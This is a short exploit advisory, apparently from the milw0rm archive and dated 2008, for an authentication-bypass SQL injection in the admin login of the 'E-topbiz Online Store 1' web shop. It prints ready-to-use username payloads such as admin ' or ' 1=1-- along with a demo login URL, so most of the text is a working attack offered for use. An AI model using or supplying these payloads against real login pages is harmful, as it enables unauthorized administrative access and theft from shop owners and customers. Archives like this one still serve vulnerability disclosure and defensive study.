1 E−topbiz Online Store 1 (Auth Bypass) SQL Injection Vulnerability
2
3 author: ZoRLu msn: trt−turk@hotmail.com
4
5 Home: www.z0rlu.blogspot.com
6
7 N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( bIktIm a.q )
8
9 Exploit:
10
11 username: [real_admin_name] ’ or ’ 1=1
12
13 password: ZoRLu
14
15 note: generally admin name: admin
16
17
18 for demo:
19
20 http://e−topbiz.com/trafficdemos/store1/admin/login.php
21
22 username: admin ’ or ’ 1=1−−
23
24 password: ZoRLu
25
26
27 thanks: str0ke & yildirimordulari.org & darkc0de.com
28
29 # milw0rm.com [2008−11−07]
Page 1/1
Etopbiz Online Store 1 Auth Bypass SQL Injection Vuln
ZoRLu
11/07/2008